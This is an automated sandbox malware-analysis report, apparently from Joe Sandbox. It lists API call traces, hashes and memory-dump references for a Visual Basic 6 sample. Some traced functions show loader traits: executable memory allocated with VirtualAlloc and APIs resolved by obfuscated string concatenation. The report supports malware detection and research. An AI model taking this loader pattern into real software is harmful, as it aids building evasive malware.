__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3), ref: 0054E104
__vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526), ref: 0054E122
__vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E145
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C), ref: 0054E187
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054E1A0
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054E1B4
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054E1D2
__vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E1F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000020), ref: 0054E237
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000), ref: 0054E250
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 0054E264
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 0054E282
__vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E2A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000020), ref: 0054E2E7
__vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054E300
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054E314
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054E332
__vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,?), ref: 0054E35C
__vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,?), ref: 0054E366
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E373
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E384
__vbaStrToUnicode.MSVBVM60(?,?,00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E390
__vbaFreeStr.MSVBVM60 ref: 0054E3A7
__vbaSetSystemError.MSVBVM60(00000000,00006610,00000000,00000000,00000000), ref: 0054E3C5
__vbaAryLock.MSVBVM60(?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E3D3
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E3FB
__vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E404
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 0054E41E
__vbaFreeObj.MSVBVM60(0054E45F,?,00000000), ref: 0054E451
__vbaFreeStr.MSVBVM60(0054E45F,?,00000000), ref: 0054E459

Strings

_T, xrefs: 0054E3BA

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrChkstkCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
String ID: _T
API String ID: 1357747868-17957468
Opcode ID: c2c08aa6c3202df87de38de8ccb6c2885ebdc9408102f11a4538190cc72e27a3
Instruction ID: 49ba3707f5f540de73714f7e50ab626a3ebfaa8401d0e1c142f63208a441c64d
Opcode Fuzzy Hash: c2c08aa6c3202df87de38de8ccb6c2885ebdc9408102f11a4538190cc72e27a3
Instruction Fuzzy Hash: 76D1D171D40209AFDF10EBE1CC46BEEBBB8BF08704F14442AF501BB1A1D7799A559B24

Function 0054DD50 Relevance: 39.2, APIs: 26, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D618,?,?), ref: 0054DD6D
__vbaVarAdd.MSVBVM60(?,00000002,?,?,00006011,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DDE1
__vbaVarSub.MSVBVM60(?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401526), ref: 0054DDF2
__vbaI4Var.MSVBVM60(00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401526), ref: 0054DDF8
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?), ref: 0054DE0A
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE1B
#644.MSVBVM60(?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE31
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE40
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE49
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,00000000,?,?,?,?,?), ref: 0054DE70
__vbaAryLock.MSVBVM60(?,?), ref: 0054DE81
__vbaAryLock.MSVBVM60(?,?,?,?), ref: 0054DE8D
__vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?), ref: 0054DECC
__vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054DED5
__vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054DEDE
__vbaVarMove.MSVBVM60 ref: 0054DEF9
__vbaVarTstEq.MSVBVM60(00008003,?), ref: 0054DF1C

Part of subcall function 0054DCCE: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?,00401526), ref: 0054DCE9
Part of subcall function 0054DCCE: __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?), ref: 0054DCFE
Part of subcall function 0054DCCE: __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD07
Part of subcall function 0054DCCE: __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD1C

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?), ref: 0054DF41
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054DF52
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0054DF68
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF77
__vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF83
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF99
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DFA8
__vbaFreeVar.MSVBVM60(0054E00A,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DFF9
__vbaAryDestruct.MSVBVM60(00000000,?,0054E00A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054E004

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$LockUnlock$#644$ChkstkFreeMoveRedim$DestructErrorListSystemUbound
String ID:
API String ID: 1237311878-0
Opcode ID: d4d9666b273c8af4bb3b8120a284aacd6727943c3331734659f14b46b7e3dd7d
Instruction ID: d4289f82e5e34e728965eeea200cdb993f31b24a799de9b59a418bf9570b1a82
Opcode Fuzzy Hash: d4d9666b273c8af4bb3b8120a284aacd6727943c3331734659f14b46b7e3dd7d
Instruction Fuzzy Hash: 5C81A9B1D1020CAFDF14EFE5DC46EDEBBB8AF08304F44446AF505EB2A1DA75A9448B64

Function 0054C231 Relevance: 33.2, APIs: 22, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054C24C
#644.MSVBVM60(?,?,?,?,00401526), ref: 0054C264
#644.MSVBVM60(00000000,?,?,?,?,?,00401526), ref: 0054C289
#644.MSVBVM60(?,?,-00000004,00000000,?,?,?,?,?,00401526), ref: 0054C2A5

Part of subcall function 0054F786: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C2B9,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054F7A1
Part of subcall function 0054F786: __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401526,?,?,?,0054C2B9), ref: 0054F7C6
Part of subcall function 0054F786: __vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F7D8
Part of subcall function 0054F786: __vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F7E2
Part of subcall function 0054F786: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7E8
Part of subcall function 0054F786: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7F2
Part of subcall function 0054F786: __vbaObjSetAddref.MSVBVM60(005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F801
Part of subcall function 0054F786: __vbaFreeObjList.MSVBVM60(00000002,?,00000000,005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F810
Part of subcall function 0054F786: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F824
Part of subcall function 0054F786: #644.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F82A
Part of subcall function 0054F786: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F835
Part of subcall function 0054F786: __vbaAryLock.MSVBVM60(?,?), ref: 0054F87B
Part of subcall function 0054F786: #644.MSVBVM60(?,?,?), ref: 0054F893
Part of subcall function 0054F786: __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054F89F

__vbaChkstk.MSVBVM60(?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2CB

Part of subcall function 0054C559: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C575
Part of subcall function 0054C559: __vbaVarDup.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C58D
Part of subcall function 0054C559: #644.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C598
Part of subcall function 0054C559: __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401526), ref: 0054C5A2
Part of subcall function 0054C559: __vbaFreeVar.MSVBVM60(0054C695,00000000,?,00000000,?,00000002,?), ref: 0054C68F

__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2E6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2F0
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2F8
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C310

Part of subcall function 0054C559: #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054C5FE
Part of subcall function 0054C559: __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C619
Part of subcall function 0054C559: __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C623
Part of subcall function 0054C559: __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C62B
Part of subcall function 0054C559: __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054C64C
Part of subcall function 0054C559: __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054C656

__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C32B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C335
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C33D
__vbaNew2.MSVBVM60(004082A0,00000000,?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004), ref: 0054C362
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000024,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054C3C6
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0054C3D7
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054C3DF
#644.MSVBVM60(?,?), ref: 0054C3EC
#644.MSVBVM60(?,?,?,?), ref: 0054C416
__vbaFreeVar.MSVBVM60(?,?,00000008,00000040,?,?,?,?), ref: 0054C436
__vbaFreeStr.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C44E
__vbaFreeObj.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C456
__vbaFreeStr.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C45E

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$Free$#644$Move$Chkstk$Addref$#697CastCheckHresultListLockNew2RedimUnlock
String ID:
API String ID: 1321261956-0
Opcode ID: d386b2a2659407077ed9a4f6ce9ac3479629d4122768626c9443982ff507ab4f
Instruction ID: 6055d61974fc2c9b3d1c122a7c00d8d89ed8ea0644231ac08d06271b717b22f1
Opcode Fuzzy Hash: d386b2a2659407077ed9a4f6ce9ac3479629d4122768626c9443982ff507ab4f
Instruction Fuzzy Hash: 1B71E371D00208AFDB00EFA5C946ADDBBB5FF48344F10842AF505BB2A1EB79AA45CF54

Function 0054CB74 Relevance: 25.6, APIs: 17, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054CB90

Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB

#644.MSVBVM60(?,005A8456,?,?,?,?,00401526), ref: 0054CBB9
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,00000004,?,005A8456,?,?,?,?,00401526), ref: 0054CBDF
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,?,00000000,00000004,?,005A8456), ref: 0054CBFD
__vbaAryLock.MSVBVM60(?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC0C
#644.MSVBVM60(?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC22
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC2E
__vbaAryLock.MSVBVM60(?,?,?,-00000004,?,?,?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC51
#644.MSVBVM60(?,?,?,?,-00000004,?,?,?,?,?,?,005A8456), ref: 0054CC67
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,-00000004,?,?,?,?,?,?,005A8456), ref: 0054CC73

Part of subcall function 0054CACD: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CAE9
Part of subcall function 0054CACD: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054CB01
Part of subcall function 0054CACD: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054CB0B
Part of subcall function 0054CACD: #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054CB11
Part of subcall function 0054CACD: __vbaVarMove.MSVBVM60 ref: 0054CB26
Part of subcall function 0054CACD: __vbaFreeStr.MSVBVM60 ref: 0054CB2E

__vbaAryLock.MSVBVM60(?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?,?,?), ref: 0054CC9B
#644.MSVBVM60(?,?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?,?), ref: 0054CCB1
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,00401526,?,?,?,?,?,?,?,?,-00000004,?), ref: 0054CCBD
__vbaI4Var.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401526,?,?,?,?,?,?), ref: 0054CCD9
__vbaVarMove.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?,?,?), ref: 0054CCF7
__vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?,?,?), ref: 0054CCFF
__vbaAryDestruct.MSVBVM60(00000000,?,0054CD3B,?,00000000,?,?,00000000,?,?,?,?,?,?,00401526,?), ref: 0054CD35

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$#644$ChkstkLockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual
String ID:
API String ID: 2337634516-0
Opcode ID: 495222ed75ca7685274d3f831d9005dc762c1344a2d7a4b32183b035c66987ce
Instruction ID: 6293dab0e36c9b952509f9bd3a673a9423ced826363ee4a084a0efce887c3bcc
Opcode Fuzzy Hash: 495222ed75ca7685274d3f831d9005dc762c1344a2d7a4b32183b035c66987ce
Instruction Fuzzy Hash: CB51E6B1D01249AFDF04EFE5CD86EEEBBB9EF04304F14442AF501BB2A1D679A9058B14

Function 005C7404 Relevance: 15.1, APIs: 10, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,005C553A,?,?,?,?,00401526), ref: 005C741F
__vbaNew2.MSVBVM60(0040839C,005C9300,?,?,?,00000000,00401526,?,?,?,005C553A), ref: 005C744E
__vbaChkstk.MSVBVM60 ref: 005C748A
__vbaChkstk.MSVBVM60 ref: 005C749B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5C4,000002B0), ref: 005C74D2
__vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C74F3
__vbaNew2.MSVBVM60(0040839C,005C9300), ref: 005C7523
__vbaObjSetAddref.MSVBVM60(?,?), ref: 005C7541
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C756A
__vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C757B

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ChkstkNew2$CheckHresult$AddrefFree
String ID:
API String ID: 2042159070-0
Opcode ID: 76bf631e61de1b167c3174e80b57effb729768875388a7f6e215214489d6fa69
Instruction ID: 66ffeba6f411a64e52c688429e61e61fd3b19f861553908431b088cab20c5698
Opcode Fuzzy Hash: 76bf631e61de1b167c3174e80b57effb729768875388a7f6e215214489d6fa69
Instruction Fuzzy Hash: FD41D0B0904608EFCB10EFD1D88AF9DBFB5BB09708F20082AF0017A6A1C7B95944DF55

Function 005C738D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2CC,?,?,?,?,?,?,00401526), ref: 005C73A8
__vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401526), ref: 005C73D0

Strings

0, xrefs: 005C73BA

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd

Similarity

API ID: __vba$ChkstkErrorSystem
String ID: 0
API String ID: 2242893769-4108050209
Opcode ID: 224de5bf81c1a739f28e14e45bf58c6758a462538f1e7a0cdf26763425c64e60
Instruction ID: e558a696766fdc1434adbcb20caa17b6e33493bbbaa160aa73e3dcff6563a554
Opcode Fuzzy Hash: 224de5bf81c1a739f28e14e45bf58c6758a462538f1e7a0cdf26763425c64e60
Instruction Fuzzy Hash: A9E0E5B1540348BAD600DBC5CD47F5ABAACE709F54F50462EF500B70D0C3BC2E00866A

Function 0054B24F Relevance: 4.5, APIs: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401526), ref: 0054B26B

Part of subcall function 005C732C: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2B6,?,?,?,?,?,00401526), ref: 005C7347

__vbaFreeVar.MSVBVM60(?,?,?,?,?,00401526), ref: 0054B2B9

Part of subcall function 0054B868: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054B2C3,?,?,?,?,?,00401526), ref: 0054B885
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8A1
Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8AB
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8B6
Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8C0
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8CB
Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3,?), ref: 0054B8D5
Part of subcall function 0054B868: #644.MSVBVM60(00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526,?,?,?,0054B2C3), ref: 0054B8DB
Part of subcall function 0054B868: GetModuleHandleW.KERNEL32(00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000,00401526), ref: 0054B8E1
Part of subcall function 0054B868: __vbaFreeStrList.MSVBVM60(00000003,?,00401526,00000000,00000000,00000000,0040A710,00000000,bvm,00000000,0040A6F8,0040A6F0,?,?,?,00000000), ref: 0054B8F9
Part of subcall function 0054B868: __vbaChkstk.MSVBVM60 ref: 0054B918
Part of subcall function 0054B868: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054B93A
Part of subcall function 0054B868: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054B944
Part of subcall function 0054B868: GetProcAddress.KERNEL32(00000000,?), ref: 0054B950
Part of subcall function 0054B868: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B964
Part of subcall function 0054B868: __vbaFreeVar.MSVBVM60 ref: 0054B96F
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A728,0040A71C), ref: 0054B97E
Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A728,0040A71C), ref: 0054B988
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B993
Part of subcall function 0054B868: __vbaStrMove.MSVBVM60(0040A738,00000000,0040A728,0040A71C), ref: 0054B99D
Part of subcall function 0054B868: __vbaStrCat.MSVBVM60(0040A74C,00000000,0040A738,00000000,0040A728,0040A71C), ref: 0054B9A8

Part of subcall function 005C738D: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054B2CC,?,?,?,?,?,?,00401526), ref: 005C73A8
Part of subcall function 005C738D: __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401526), ref: 005C73D0

__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401526), ref: 0054B2CF

Memory Dump Source

Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
